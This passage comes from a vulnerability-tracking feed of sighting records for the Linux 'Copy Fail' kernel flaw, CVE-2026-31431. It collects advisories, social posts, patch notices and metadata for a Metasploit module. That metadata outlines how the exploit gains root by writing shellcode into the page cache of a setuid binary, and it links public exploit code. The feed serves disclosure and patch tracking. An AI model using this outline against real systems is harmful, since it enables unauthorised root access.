"CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bitralix.com/post/3mkzcvi4sff2j", "content": "\ud83d\udea8 La CVE-2026-31431 es una vulnerabilidad cr\u00edtica en Linux que exige una respuesta r\u00e1pida, sobre todo en hosting y servidores\n\n\u2705 En Bitralix hemos preparado un an\u00e1lisis con contexto, mitigaci\u00f3n y una minigu\u00eda para Ubuntu:\nbitralix.es/eqygy\n\n#Bitralix #CVE202631431 #Linux #Hosting #Ubuntu #Seguridad", "creation_timestamp": "2026-05-04T09:04:14.398721Z"}, {"uuid": "fa60b8a3-e1f2-4fed-841e-8849c2ad2c55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1847", "content": "", "creation_timestamp": "2026-05-03T21:00:00.000000Z"}, {"uuid": "5fd1e53d-846a-4d54-a8d5-3c65994e09c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1846", "content": "", "creation_timestamp": "2026-05-03T21:00:00.000000Z"}, {"uuid": "ae7b2bc8-a67f-41bb-a297-7551335973b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkyklgfls62x", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T01:49:06.736872Z"}, {"uuid": "3adc5f55-747b-4d44-8781-8770df2b68ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/kasperskyb2b/2158", "content": "\ud83d\udc40 \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\udfe2\u0412 \u0430\u0442\u0430\u043a\u0430\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Silver Fox \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0437\u0438\u0430\u0446\u0438\u0438 \u0432 \u0420\u0424 \u0438 \u0432 \u0418\u043d\u0434\u0438\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d \u043d\u043e\u0432\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440 ABCDoor. \u0420\u0435\u0442\u0440\u043e\u0441\u043f\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c 7 \u0432\u0435\u0440\u0441\u0438\u0439 \u0412\u041f\u041e, \u043f\u0435\u0440\u0432\u0430\u044f \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0434\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0430\u0436 2024 \u0433\u043e\u0434\u043e\u043c, \u043d\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u0435 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f \u043f\u043e \u0441\u0435\u0439 \u0434\u0435\u043d\u044c. \u041d\u0430\u0447\u0438\u043d\u0430\u044e\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0438 \u0441 \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u043d\u0430\u043b\u043e\u0433\u043e\u0432\u043e\u0439 \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u0438. \n\n\ud83d\udfe3\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2026-31431 (CopyFail), \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0435\u0439 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0443 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u0431\u043e\u0440\u043e\u043a Linux. \u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u0430 \u0443\u0433\u0440\u043e\u0437\u0430 \u0434\u043b\u044f \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043d\u044b\u0445 \u0441\u0440\u0435\u0434:  Docker, LXC \u0438 Kubernetes.\n\n\ud83d\udd35\u0412 \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u0435 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 npm \u0431\u0443\u0448\u0443\u0435\u0442 \u044d\u043f\u0438\u0434\u0435\u043c\u0438\u044f Mini Shai-Hulud: \u0447\u0435\u0440\u0432\u044c \u043f\u043e\u0440\u0430\u0437\u0438\u043b \u043f\u0430\u043a\u0435\u0442\u044b SAP \u0438 intercom. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e \u0442\u0435 \u0436\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043f\u0430\u043a\u0435\u0442\u044b lightning \u0432 PyPi. TTPs \u043f\u043e\u0445\u043e\u0436\u0438 \u043d\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0443 TeamPCP.\n\n\ud83d\udfe3\u0413\u0440\u0443\u043f\u043f\u0430 HeartlessSoul, \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u0430\u044f \u043e\u0441\u0435\u043d\u044c\u044e 2025 \u0433\u043e\u0434\u0430, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0430\u0432\u0438\u0430\u0446\u0438\u043e\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0438 \u0432 \u0447\u0438\u0441\u043b\u0435 \u043f\u043e\u0445\u0438\u0449\u0430\u0435\u043c\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u0435\u043b\u0430\u0435\u0442 \u043e\u0441\u043e\u0431\u044b\u0439 \u0430\u043a\u0446\u0435\u043d\u0442 \u043d\u0430 \u0444\u0430\u0439\u043b\u044b \u0433\u0435\u043e\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. \u041f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u0435\u043d \u043f\u043e\u0434\u0445\u043e\u0434 \u043a \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044e: \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0440\u0435\u043a\u043b\u0430\u043c\u0438\u0440\u0443\u0435\u0442 \u0441\u0430\u0439\u0442\u044b-\u0444\u0430\u043b\u044c\u0448\u0438\u0432\u043a\u0438 \u0441 \u0442\u0440\u043e\u044f\u043d\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u041f\u041e \u0434\u043b\u044f \u0430\u0432\u0438\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n\n\ud83d\udfe3\u0412\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438 \u0442\u043e\u0436\u0435 \u0432\u043e\u043b\u043d\u0443\u044e\u0442\u0441\u044f \u043e \u043f\u043e\u0441\u0442\u043a\u0432\u0430\u043d\u0442\u043e\u0432\u043e\u0439 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u2014 \u043d\u043e\u0432\u044b\u0439 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a Kyber \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0432 \u0441\u0432\u043e\u0435\u0439 \u0440\u0430\u0431\u043e\u0442\u0435 \u0433\u0438\u0431\u0440\u0438\u0434\u043d\u044b\u0439 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u0441 \u041f\u041a\u0428.\n\n\ud83d\udd35\u041e\u0433\u0440\u043e\u043c\u043d\u044b\u0439 150-\u0441\u0442\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0439 \u043e\u0442\u0447\u0435\u0442 \u043e \u0441\u043b\u043e\u0436\u043d\u043e\u043c \u0412\u041f\u041e EasterBunny (pdf) \u0438 TTPs APT29/DarkHalo, \u0435\u0433\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0449\u0435\u0439. \u0421\u0440\u0435\u0434\u0438 \u043b\u044e\u0431\u043e\u043f\u044b\u0442\u043d\u044b\u0445 \u0434\u0435\u0442\u0430\u043b\u0435\u0439 \u2014 \u0436\u0451\u0441\u0442\u043a\u0430\u044f \u043f\u0440\u0438\u0432\u044f\u0437\u043a\u0430 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430 \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u043d \u043d\u0430\u0446\u0435\u043b\u0435\u043d, \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0441\u044f.\n\n\ud83d\udfe3\u041d\u043e\u0432\u044b\u0435 \u0440\u0430\u0437\u043d\u043e\u0432\u0438\u0434\u043d\u043e\u0441\u0442\u0438 ClickFix: \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043a\u043e\u043c\u0430\u043d\u0434 cmdkey \u0438 regsvr32 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0412\u041f\u041e.\n\n\ud83d\udd35\u0417\u0430\u043a\u0440\u044b\u0442\u0430\u044f \u0432 \u0430\u043f\u0440\u0435\u043b\u044c\u0441\u043a\u043e\u043c Patch Tuesday CVE-2026-32202, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0445\u044d\u0448\u0435\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0442\u0435\u043f\u0435\u0440\u044c \u043f\u043e\u043c\u0435\u0447\u0435\u043d\u0430 \u043a\u0430\u043a \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u0430\u044f. \u0414\u0435\u0444\u0435\u043a\u0442 \u0432\u043e\u0437\u043d\u0438\u043a \u0438\u0437-\u0437\u0430 \u043d\u0435\u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0444\u0435\u0432\u0440\u0430\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0437\u0438\u0440\u043e\u0434\u0435\u044f CVE-2026-21510.\n\n\ud83d\udfe3\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0430\u044f \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u2014 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043f\u043b\u0430\u0433\u0438\u043d \u0434\u043b\u044f WordPress \u0431\u044b\u043b \u0438\u0437\u0433\u043e\u0442\u043e\u0432\u043b\u0435\u043d \u0438\u0437 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0435\u0449\u0435 \u0432 2020 \u0433\u043e\u0434\u0443, \u043d\u043e \u043e\u0431\u0437\u0430\u0432\u0451\u043b\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c\u044e \u0442\u043e\u043b\u044c\u043a\u043e \u0432 2026. \n\n\ud83d\udd35\u0420\u0430\u0437\u0431\u043e\u0440 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u0433\u043b\u043e\u0431\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u043f\u0430\u043c-\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0441 \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0445 SMS \u043e\u0431 \u043e\u043f\u043b\u0430\u0442\u0435 \u0434\u043e\u0440\u043e\u0436\u043d\u044b\u0445 \u043f\u043e\u0448\u043b\u0438\u043d \u0438 \u0448\u0442\u0440\u0430\u0444\u043e\u0432. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0436\u0435\u0440\u0442\u0432 \u0437\u0430\u043c\u0430\u043d\u0438\u0432\u0430\u044e\u0442 \u043d\u0430 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u043b\u0430\u0442\u0451\u0436\u043d\u044b\u0435 \u0441\u0430\u0439\u0442\u044b \u0438 \u0441\u0430\u0439\u0442\u044b, \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0435 \u0412\u041f\u041e.\n\n\ud83d\udfe2\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-41940 \u0432 \u043f\u0430\u043d\u0435\u043b\u044f\u0445 cPanel \u0438 WHM, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0430\u0434\u043c\u0438\u043d\u0441\u043a\u0438\u0435 \u043f\u0440\u0430\u0432\u0430 \u0431\u0435\u0437 \u0432\u0441\u044f\u043a\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0435\u0449\u0451 \u0434\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u044c cPanel, \u044d\u0442\u043e \u0432\u0435\u0441\u044c\u043c\u0430 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u043e \u2014 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c\u0441\u044f \u043d\u0443\u0436\u043d\u043e \u0432 \u0441\u0440\u043e\u0447\u043d\u043e\u043c \u043f\u043e\u0440\u044f\u0434\u043a\u0435. \n\n\ud83d\udfe3\u041d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u043e\u0435 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 \u0433\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u0441\u043a\u0430\u043c-\u0446\u0435\u043d\u0442\u0440\u043e\u0432 (\u0438 \u0431\u043e\u0440\u044c\u0431\u044b \u0441 \u043d\u0438\u043c\u0438) \u2014 \u0434\u0435\u0432\u044f\u0442\u044c \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043e\u0444\u0438\u0441\u043e\u0432 \u0437\u0430\u043a\u0440\u044b\u043b\u0438 \u0432 \u0414\u0443\u0431\u0430\u0435.\n\n#\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 #APT @\u041f2\u0422", "creation_timestamp": "2026-05-04T09:44:28.000000Z"}, {"uuid": "3353c297-7903-4005-9957-e7f92fcbf3a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82735", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a RK35xx-CopyFail-Hotfix\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Qengineering\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 08:56:14\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRK35xx CopyFail Hotfix: CVE-2026-31431 Patch for Ubuntu 24.04\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T09:00:04.000000Z"}, {"uuid": "a3acd964-129a-419f-af29-d56b6747f8b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mkzjyo3dghq2", "content": "Linux: CISA Warns of Linux Kernel Zero-Day Vulnerability Exploited in Active Attacks CISA Warns of Actively Exploited Linux Kernel Vulnerability (CVE-2026-31431) The U.S. Cybersecurity and Infrastr...\n\n#cyber #Vulnerability\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-04T11:14:37.229108Z"}, {"uuid": "a8b72110-e060-4d33-9c11-3cf3eb4277eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mkzlvnvq2q2q", "content": "CISA reports active exploitation of "Copy Fail" Linux kernel flaw (CVE-2026-31431) allowing local users to gain root access. Federal agencies must patch by May 15 under BOD 22-01. #LinuxKernel #RootAccess #USA", "creation_timestamp": "2026-05-04T11:45:24.229336Z"}, {"uuid": "6c614102-c3c9-4853-bd03-e51836a242ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mkzyhprqbp2u", "content": "\ud83d\udd17 CVE : CVE-2026-31431", "creation_timestamp": "2026-05-04T15:30:14.888541Z"}, {"uuid": "0d8520a9-0f6b-4368-821b-870b59fac7df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelsandpulse.bsky.social/post/3mkznjpeaxq2g", "content": "A quiet Linux kernel flaw, 'Copy Fail' (CVE-2026-31431), has been actively exploited since 2017, allowing root access with a tiny script. This LPE is a major threat to cloud container security, proving even 'boring' bugs can be\u2026\n\nhttps://www.tpp.blog/qoupvah\n\n#cybersecurity #cve202631431 #copyfail", "creation_timestamp": "2026-05-04T12:14:30.353343Z"}, {"uuid": "4cbf6d53-fe76-46f4-8f7c-dbaf8c0b616d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mhatta.org/post/3mkzofu7rvx25", "content": "copy.fail (CVE-2026-31431): a small Linux kernel bug with an unusually big blast radius | Jorijn Schrijvershof", "creation_timestamp": "2026-05-04T12:30:14.962219Z"}, {"uuid": "327adf20-1743-4895-bc36-9cae6cd0c99f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.cert.se/2026/05/allvarlig-sarbarhet-i-flertal-linuxdistributioner.html", "content": "", "creation_timestamp": "2026-05-04T03:00:00.000000Z"}, {"uuid": "259c62ea-0f89-44af-b747-9be6eef5a94d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/iinikolaev/2ea316b1d8192f31153454117bc2870d", "content": "", "creation_timestamp": "2026-05-04T13:26:19.000000Z"}, {"uuid": "85aebff3-aab3-474e-92ec-05f0f668598c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/news.humancoders.com/post/3mkzfzsf3kv22", "content": "Copy Fail CVE-2026-31431 : patch kernel Linux et mitigation", "creation_timestamp": "2026-05-04T10:00:21.564370Z"}, {"uuid": "eefc0aa9-56aa-4b70-9aa6-cd4f37362967", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb", "content": "{\"actions\": [], \"aliases\": [], \"arch\": \"cmd\", \"author\": [\"Xint Code\", \"rootsecdev\", \"Spencer McIntyre\", \"Diego Ledda\"], \"autofilter_ports\": [], \"autofilter_services\": [], \"check\": true, \"default_credential\": false, \"description\": \"CVE-2026-31431 is a logic flaw in the Linux kernel's authencesn AEAD template that, when reached via the\\n          AF_ALG socket interface combined with splice(), allows an unprivileged local user to perform a controlled\\n          4-byte write into the page cache of any readable file. Because the corrupted pages are never marked dirty, the\\n          on-disk file is unchanged but the in-memory version is immediately visible system-wide, enabling local\\n          privilege escalation by injecting shellcode into the page cache of a setuid-root binary such as /usr/bin/su.\\n          The vulnerability was introduced by an in-place optimization in algif_aead.c (commit 72548b093ee3, 2017) and\\n          affects essentially all major Linux distributions shipped since then until the fix in commit a664bf3d603d.\", \"disclosure_date\": \"2026-04-29\", \"fullname\": \"exploit/linux/local/cve_2026_31431_copy_fail\", \"is_install_path\": true, \"mod_time\": \"2026-04-30 17:51:30 +0000\", \"name\": \"Copy Fail AF_ALG + authencesn Page-Cache Write\", \"needs_cleanup\": null, \"notes\": {\"AKA\": [\"Copy Fail\"], \"Reliability\": [\"repeatable-session\"], \"SideEffects\": [], \"Stability\": [\"crash-safe\"]}, \"path\": \"/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb\", \"platform\": \"Linux,Unix\", \"post_auth\": false, \"rank\": 600, \"ref_name\": \"linux/local/cve_2026_31431_copy_fail\", \"references\": [\"CVE-2026-31431\", \"URL-https://copy.fail/\", \"URL-https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py\", \"URL-https://github.com/rootsecdev/cve_2026_31431\"], \"rport\": null, \"session_types\": [\"shell\", \"meterpreter\"], \"targets\": [\"Linux Command\"], \"type\": \"exploit\"}", "creation_timestamp": "2026-04-30T22:30:05.000000Z"}, {"uuid": "47694d3a-063f-4142-bdff-58a40b876492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mkzumywkak2d", "content": " **Linux Security Alert! **\nThe 'Copy Fail' (CVE-2026-31431) flaw lets ANY local user gain root access on SUSE & other distros.  Read more->  tinyurl.com/mr5e2y7d  #SUSE #Security", "creation_timestamp": "2026-05-04T14:21:39.931131Z"}, {"uuid": "3fbc1200-d904-4bb8-bf23-99ed68d8282a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/aimainainnu.bsky.social/post/3mkynce7sok2d", "content": "\u300cCopy Fail\u300dLinux \u30d0\u30b0\uff1a732\u30d0\u30a4\u30c8\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u30672017\u5e74\u4ee5\u964d\u306e\u307b\u307c\u3059\u3079\u3066\u306e\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306b\u3066 root \u6a29\u9650\u306e\u53d6\u5f97\u304c\u53ef\u80fd\u306b - BigGo \u30cb\u30e5\u30fc\u30b9 \n\nLinux \u30ab\u30fc\u30cd\u30eb\u306b\u304a\u3051\u308b\u300cCopy Fail\u300d\u3068\u547d\u540d\u3055\u308c\u305f CVE-2026-31431 \u3068\u3044\u3046\u6df1\u523b\u306a\u8ad6\u7406\u30d9\u30fc\u30b9\u306e\u8106\u5f31\u6027\u306f\u3001\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u304a\u3088\u3073\u30af\u30e9\u30a6\u30c9\u30b3\u30f3\u30d4\u30e5\u30fc\u30c6\u30a3\u30f3\u30b0\u306e ... \nbiggo.jp/news/2026050...", "creation_timestamp": "2026-05-04T02:37:48.394653Z"}, {"uuid": "1d98ffb8-5ff3-4351-9ae3-f20361dcbb38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/rockylinux.org/post/3mkzweewt5p27", "content": "Kernel crypto vulnerability alert: CVE-2026-31431 (Copy Fail) affects Rocky Linux users. Our community is tracking patches and next steps in real time.\nRocky-specific guidance: forums.rockylinux.org/t/cve-2026-3... \n#RockyLinux #LinuxSecurity", "creation_timestamp": "2026-05-04T14:52:35.570567Z"}, {"uuid": "3b3ae144-d3d3-4d5c-b7c1-6dcaa6e76391", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82768", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a play-go-copy-fail-cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a imkk000\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 13:57:48\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": 